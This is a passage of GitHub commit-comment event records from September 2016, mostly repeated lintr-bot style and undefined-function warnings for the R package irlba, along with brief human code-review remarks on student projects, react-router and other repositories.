*warning:* **no visible global function definition for ‘orthog’**\n```r\n​        if (reorth && w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                               ^~~~~~\n```\n[R/irlba.R:531:14:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L531) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        S <- norm2(W[, jp1_w])\n             ^~~~~\n```\n[R/irlba.R:536:40:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L536) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          if (w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                       ^~~~~~\n```\n[R/irlba.R:537:38:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L537) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] / norm2(W[, jp1_w])\n                                     ^~~~~\n```\n[R/irlba.R:557:12:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L557) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    R_F <- norm2(F)\n           ^~~~~\n```\n[R/irlba.R:620:5:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/irlba.R#L620) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[R/prcomp.R:84:16:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/prcomp.R#L84) *warning:* **no visible binding for global variable ‘irlba’**\n```r\n​  s <- do.call(irlba, args=args)\n               ^~~~~\n```\n[R/utility.R:19:13:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/R/utility.R#L19) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​  drop(sqrt(cross(x)))\n            ^~~~~\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/e1fb240b02ed84d2f23f61fc48bafb30073c0a9e/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```"}},"created_at":"2016-09-16T23:38:38Z"}
{"id":"4576899193","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"rrdesai/dsp"},"payload":{"comment":{"id":19061707,"position":null,"line":null,"path":null,"commit_id":"2f88cbb6d6e2ad8c264f960eebfdd829001c61cd","created_at":"2016-09-16T23:38:59Z","updated_at":"2016-09-16T23:38:59Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @rrdesai \r\n\r\nNice work on the linear algebra problems!\r\n\r\n👍 "}},"created_at":"2016-09-16T23:38:59Z"}
{"id":"4576899627","type":"CommitCommentEvent","actor":{"login":"Oleiva"},"repo":{"name":"art07/RepositoryGoIT"},"payload":{"comment":{"id":19061708,"position":4,"line":4,"path":"GoIT_Project_1/src/module_5_homework/DAO.java","commit_id":"ab450d450535d429b69283ce9a2fa60c24196a6b","created_at":"2016-09-16T23:39:11Z","updated_at":"2016-09-16T23:39:11Z","body":"abstract работает только в абстрактных классах. "}},"created_at":"2016-09-16T23:39:11Z"}
{"id":"4576900373","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"amy-b/finalProject"},"payload":{"comment":{"id":19061710,"position":17,"line":17,"path":"index.html","commit_id":"460f5de1ee88377109bd03028b20f63f4736e6da","created_at":"2016-09-16T23:39:29Z","updated_at":"2016-09-16T23:39:29Z","body":"👍  You're welcome!"}},"created_at":"2016-09-16T23:39:29Z"}
{"id":"4576901929","type":"CommitCommentEvent","actor":{"login":"ryanflorence"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19061714,"position":null,"line":null,"path":null,"commit_id":"ab57fa8554e4d2efaeaf2dd0ab82ea6434bac5b5","created_at":"2016-09-16T23:40:08Z","updated_at":"2016-09-16T23:40:08Z","body":"In the DOM the use-case is usually styling a parent of your link, which is doable w/ this:\r\n\r\n\r\n```js\r\nconst ListLink = ({ to, className, activeClassName, ...rest }) => (\r\n  <Match to={to}>\r\n    {({ matched }) => (\r\n      <li className={className + (matched ? ' '+activeClassName : '')}>\r\n        <Link to={to} {...rest}/>\r\n      </li>\r\n    )}\r\n  </Match>\r\n)\r\n```"}},"created_at":"2016-09-16T23:40:08Z"}
{"id":"4576905065","type":"CommitCommentEvent","actor":{"login":"destdev"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19061726,"position":11,"line":51,"path":"scripts/YA02-JP/c100211001.lua","commit_id":"feb0b02377ef621c1372e40a344bfd154a9aa210","created_at":"2016-09-16T23:41:24Z","updated_at":"2016-09-16T23:41:24Z","body":"the level of the non tuner has to be 7-tuner level, not equal to the tuner level\r\nalso, I left out the trapmonster part on purpose, there is non and I don't think there will ever be a trapmonster that is special summoned from the extra deck^^"}},"created_at":"2016-09-16T23:41:24Z"}
{"id":"4576905582","type":"CommitCommentEvent","actor":{"login":"dirk-thomas"},"repo":{"name":"ros2/rmw"},"payload":{"comment":{"id":19061730,"position":15,"line":15,"path":"rmw/test/CMakeLists.txt","commit_id":"1b28064c8ba75809a2e097a4d8951331022803f9","created_at":"2016-09-16T23:41:35Z","updated_at":"2016-09-16T23:41:35Z","body":"#73"}},"created_at":"2016-09-16T23:41:35Z"}
{"id":"4576905627","type":"CommitCommentEvent","actor":{"login":"chadouming"},"repo":{"name":"BenzoRoms/packages_apps_Settings"},"payload":{"comment":{"id":19061731,"position":5,"line":6,"path":"res/xml/benzo_settings.xml","commit_id":"2dab3deed3947b34732fb332952032db4992d2b5","created_at":"2016-09-16T23:41:37Z","updated_at":"2016-09-16T23:41:37Z","body":"THis will derp your stuff"}},"created_at":"2016-09-16T23:41:37Z"}
{"id":"4576907026","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/packages_apps_Settings"},"payload":{"comment":{"id":19061737,"position":5,"line":6,"path":"res/xml/benzo_settings.xml","commit_id":"2dab3deed3947b34732fb332952032db4992d2b5","created_at":"2016-09-16T23:42:10Z","updated_at":"2016-09-16T23:42:10Z","body":"Shit. Thanks man."}},"created_at":"2016-09-16T23:42:10Z"}
{"id":"4576911059","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19061750,"position":2,"line":2,"path":"assignment6/css/style.css","commit_id":"8486c1ce7099d347364eb48afef61eb352eae229","created_at":"2016-09-16T23:43:54Z","updated_at":"2016-09-16T23:43:54Z","body":"Great job keeping your CSS so readable and organized!"}},"created_at":"2016-09-16T23:43:54Z"}
{"id":"4576911126","type":"CommitCommentEvent","actor":{"login":"timofeysie"},"repo":{"name":"juliemr/ng2-test-seed"},"payload":{"comment":{"id":19061752,"position":null,"line":null,"path":null,"commit_id":"84d591bc9b8dee172c4fc4ac816b72da8aa5503f","created_at":"2016-09-16T23:43:56Z","updated_at":"2016-09-16T23:43:56Z","body":"Making the upgrade work for me also required these changes:\r\n```\r\n -    \"rxjs\": \"5.0.0-beta.11\"\r\n +    \"rxjs\": \"5.0.0-beta.12\"\r\n -    \"zone.js\": \"^0.6.21\",\r\n +    \"zone.js\": \"^0.6.23\", \r\n -    \"angular2-in-memory-web-api\": \"0.0.19\",\r\n +   \"angular2-in-memory-web-api\": \"0.0.20\",\r\n```"}},"created_at":"2016-09-16T23:43:56Z"}
{"id":"4576911528","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19061754,"position":104,"line":104,"path":"assignment6/css/style.css","commit_id":"8486c1ce7099d347364eb48afef61eb352eae229","created_at":"2016-09-16T23:44:07Z","updated_at":"2016-09-16T23:44:07Z","body":"Great to see the comments in here to keep it clean!"}},"created_at":"2016-09-16T23:44:07Z"}
{"id":"4576912945","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"FreeCodeCamp/FreeCodeCamp"},"payload":{"comment":{"id":19061759,"position":11,"line":25,"path":".github/ISSUE_TEMPLATE.md","commit_id":"3394b43cb7c64f9a87db26077931c9c5ff8dad37","created_at":"2016-09-16T23:44:41Z","updated_at":"2016-09-16T23:44:41Z","body":"Js"}},"created_at":"2016-09-16T23:44:41Z"}
{"id":"4576913576","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19061762,"position":34,"line":34,"path":"assignment6/index.html","commit_id":"8486c1ce7099d347364eb48afef61eb352eae229","created_at":"2016-09-16T23:44:58Z","updated_at":"2016-09-16T23:44:58Z","body":"How can you use css instead of the `align` attribute to achieve the same effect?"}},"created_at":"2016-09-16T23:44:58Z"}
{"id":"4576914053","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19061766,"position":20,"line":20,"path":"assignment6/js/index.js","commit_id":"8486c1ce7099d347364eb48afef61eb352eae229","created_at":"2016-09-16T23:45:11Z","updated_at":"2016-09-16T23:45:11Z","body":"Great job using an array for this and keeping it readable! "}},"created_at":"2016-09-16T23:45:11Z"}
{"id":"4576914165","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"FreeCodeCamp/FreeCodeCamp"},"payload":{"comment":{"id":19061765,"position":11,"line":25,"path":".github/ISSUE_TEMPLATE.md","commit_id":"3394b43cb7c64f9a87db26077931c9c5ff8dad37","created_at":"2016-09-16T23:45:09Z","updated_at":"2016-09-16T23:45:09Z","body":"3394b43\r\n"}},"created_at":"2016-09-16T23:45:09Z"}
{"id":"4576914342","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19061767,"position":null,"line":null,"path":null,"commit_id":"51d3000195b8192ed15e6ee854e9f1472034ec0d","created_at":"2016-09-16T23:45:15Z","updated_at":"2016-09-16T23:45:15Z","body":"[R/eigen.R:57:10:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/eigen.R#L57) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​    L <- irlba(x, n, ...)\n         ^~~~~\n```\n[R/eigen.R:60:8:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/eigen.R#L60) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, ...)\n       ^~~~~\n```\n[R/eigen.R:68:8:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/eigen.R#L68) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, shift=shift, ...)\n       ^~~~~\n```\n[R/irlba.R:260:5:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L260) *warning:* **local variable ‘algorithm’ assigned but may not be used**\n```r\n​    algorithm = \"svd\"\n    ^~~~~~~~~\n```\n[R/irlba.R:260:15:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L260) *style:* **Use <-, not =, for assignment.**\n```r\n​    algorithm = \"svd\"\n              ^\n```\n[R/irlba.R:292:14:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L292) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      RND <- orthog(RND, v$v)\n             ^~~~~~\n```\n[R/irlba.R:293:30:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L293) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      RV <- cbind(v$v, RND / norm2(RND))\n                             ^~~~~\n```\n[R/irlba.R:327:9:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L327) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:393:10:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L393) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​    F <- orthog(F, V[, 1:k])\n         ^~~~~~\n```\n[R/irlba.R:394:23:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L394) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    V[, k + 1] <- F / norm2(F)\n                      ^~~~~\n```\n[R/irlba.R:416:26:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L416) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      V[, 1] <- V[, 1] / norm2(V[, 1])\n                         ^~~~~\n```\n[R/irlba.R:448:40:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L448) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​      W[, j_w] <- W[, j_w] - ds * drop(cross(dv, VJ)) * du\n                                       ^~~~~\n```\n[R/irlba.R:454:17:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L454) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      W[, j] <- orthog (W[, j, drop=FALSE], W[, 1:(j - 1), drop=FALSE])\n                ^~~~~~\n```\n[R/irlba.R:457:10:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L457) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    S <- norm2(W[, j_w, drop=FALSE])\n         ^~~~~\n```\n[R/irlba.R:463:32:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L463) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      if (w_dim > 1) W[, j] <- orthog(W[, j], W[, 1:(j - 1)])\n                               ^~~~~~\n```\n[R/irlba.R:464:30:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L464) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      W[, j_w] <- W[, j_w] / norm2(W[, j_w])\n                             ^~~~~\n```\n[R/irlba.R:484:12:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L484) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      F <- orthog(F, V[, 1:j, drop=FALSE])\n           ^~~~~~\n```\n[R/irlba.R:487:14:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L487) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        R <- norm2(F)\n             ^~~~~\n```\n[R/irlba.R:492:16:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L492) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          F <- orthog(F, V[, 1:j, drop=FALSE])\n               ^~~~~~\n```\n[R/irlba.R:493:29:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L493) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          V[, j + 1] <- F / norm2(F)\n                            ^~~~~\n```\n[R/irlba.R:523:48:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L523) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] - ds * drop(cross(dv, VJP1)) * du\n                                               ^~~~~\n```\n[R/irlba.R:530:48:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L530) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​        if (reorth && w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                               ^~~~~~\n```\n[R/irlba.R:531:14:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L531) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        S <- norm2(W[, jp1_w])\n             ^~~~~\n```\n[R/irlba.R:536:40:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L536) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          if (w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                       ^~~~~~\n```\n[R/irlba.R:537:38:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L537) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] / norm2(W[, jp1_w])\n                                     ^~~~~\n```\n[R/irlba.R:557:12:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L557) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    R_F <- norm2(F)\n           ^~~~~\n```\n[R/irlba.R:620:5:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L620) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[R/prcomp.R:84:16:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/prcomp.R#L84) *warning:* **no visible binding for global variable ‘irlba’**\n```r\n​  s <- do.call(irlba, args=args)\n               ^~~~~\n```\n[R/utility.R:19:13:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/utility.R#L19) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​  drop(sqrt(cross(x)))\n            ^~~~~\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```"}},"created_at":"2016-09-16T23:45:15Z"}
{"id":"4576914735","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"qtngo/homework_portfolio"},"payload":{"comment":{"id":19061769,"position":47,"line":47,"path":"assignment6/js/index.js","commit_id":"8486c1ce7099d347364eb48afef61eb352eae229","created_at":"2016-09-16T23:45:26Z","updated_at":"2016-09-16T23:45:26Z","body":"Excellent use of comments throughout!"}},"created_at":"2016-09-16T23:45:26Z"}
{"id":"4576915125","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19061772,"position":null,"line":null,"path":null,"commit_id":"51d3000195b8192ed15e6ee854e9f1472034ec0d","created_at":"2016-09-16T23:45:34Z","updated_at":"2016-09-16T23:45:34Z","body":"[R/eigen.R:57:10:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/eigen.R#L57) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​    L <- irlba(x, n, ...)\n         ^~~~~\n```\n[R/eigen.R:60:8:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/eigen.R#L60) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, ...)\n       ^~~~~\n```\n[R/eigen.R:68:8:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/eigen.R#L68) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, shift=shift, ...)\n       ^~~~~\n```\n[R/irlba.R:260:5:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L260) *warning:* **local variable ‘algorithm’ assigned but may not be used**\n```r\n​    algorithm = \"svd\"\n    ^~~~~~~~~\n```\n[R/irlba.R:260:15:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L260) *style:* **Use <-, not =, for assignment.**\n```r\n​    algorithm = \"svd\"\n              ^\n```\n[R/irlba.R:292:14:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L292) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      RND <- orthog(RND, v$v)\n             ^~~~~~\n```\n[R/irlba.R:293:30:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L293) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      RV <- cbind(v$v, RND / norm2(RND))\n                             ^~~~~\n```\n[R/irlba.R:327:9:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L327) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:393:10:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L393) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​    F <- orthog(F, V[, 1:k])\n         ^~~~~~\n```\n[R/irlba.R:394:23:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L394) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    V[, k + 1] <- F / norm2(F)\n                      ^~~~~\n```\n[R/irlba.R:416:26:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L416) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      V[, 1] <- V[, 1] / norm2(V[, 1])\n                         ^~~~~\n```\n[R/irlba.R:448:40:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L448) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​      W[, j_w] <- W[, j_w] - ds * drop(cross(dv, VJ)) * du\n                                       ^~~~~\n```\n[R/irlba.R:454:17:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L454) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      W[, j] <- orthog (W[, j, drop=FALSE], W[, 1:(j - 1), drop=FALSE])\n                ^~~~~~\n```\n[R/irlba.R:457:10:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L457) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    S <- norm2(W[, j_w, drop=FALSE])\n         ^~~~~\n```\n[R/irlba.R:463:32:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L463) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      if (w_dim > 1) W[, j] <- orthog(W[, j], W[, 1:(j - 1)])\n                               ^~~~~~\n```\n[R/irlba.R:464:30:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L464) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      W[, j_w] <- W[, j_w] / norm2(W[, j_w])\n                             ^~~~~\n```\n[R/irlba.R:484:12:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L484) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      F <- orthog(F, V[, 1:j, drop=FALSE])\n           ^~~~~~\n```\n[R/irlba.R:487:14:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L487) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        R <- norm2(F)\n             ^~~~~\n```\n[R/irlba.R:492:16:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L492) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          F <- orthog(F, V[, 1:j, drop=FALSE])\n               ^~~~~~\n```\n[R/irlba.R:493:29:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L493) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          V[, j + 1] <- F / norm2(F)\n                            ^~~~~\n```\n[R/irlba.R:523:48:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L523) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] - ds * drop(cross(dv, VJP1)) * du\n                                               ^~~~~\n```\n[R/irlba.R:530:48:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L530) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​        if (reorth && w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                               ^~~~~~\n```\n[R/irlba.R:531:14:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L531) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        S <- norm2(W[, jp1_w])\n             ^~~~~\n```\n[R/irlba.R:536:40:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L536) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          if (w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                       ^~~~~~\n```\n[R/irlba.R:537:38:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L537) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] / norm2(W[, jp1_w])\n                                     ^~~~~\n```\n[R/irlba.R:557:12:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L557) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    R_F <- norm2(F)\n           ^~~~~\n```\n[R/irlba.R:620:5:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L620) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[R/prcomp.R:84:16:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/prcomp.R#L84) *warning:* **no visible binding for global variable ‘irlba’**\n```r\n​  s <- do.call(irlba, args=args)\n               ^~~~~\n```\n[R/utility.R:19:13:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/utility.R#L19) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​  drop(sqrt(cross(x)))\n            ^~~~~\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```"}},"created_at":"2016-09-16T23:45:34Z"}
{"id":"4576915398","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19061773,"position":null,"line":null,"path":null,"commit_id":"51d3000195b8192ed15e6ee854e9f1472034ec0d","created_at":"2016-09-16T23:45:40Z","updated_at":"2016-09-16T23:45:40Z","body":"[R/eigen.R:57:10:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/eigen.R#L57) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​    L <- irlba(x, n, ...)\n         ^~~~~\n```\n[R/eigen.R:60:8:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/eigen.R#L60) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, ...)\n       ^~~~~\n```\n[R/eigen.R:68:8:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/eigen.R#L68) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, shift=shift, ...)\n       ^~~~~\n```\n[R/irlba.R:260:5:](https://github.com/bwlewis/irlba/blob/51d3000195b8192ed15e6ee854e9f1472034ec0d/R/irlba.R#L260) *warning:* **local variable 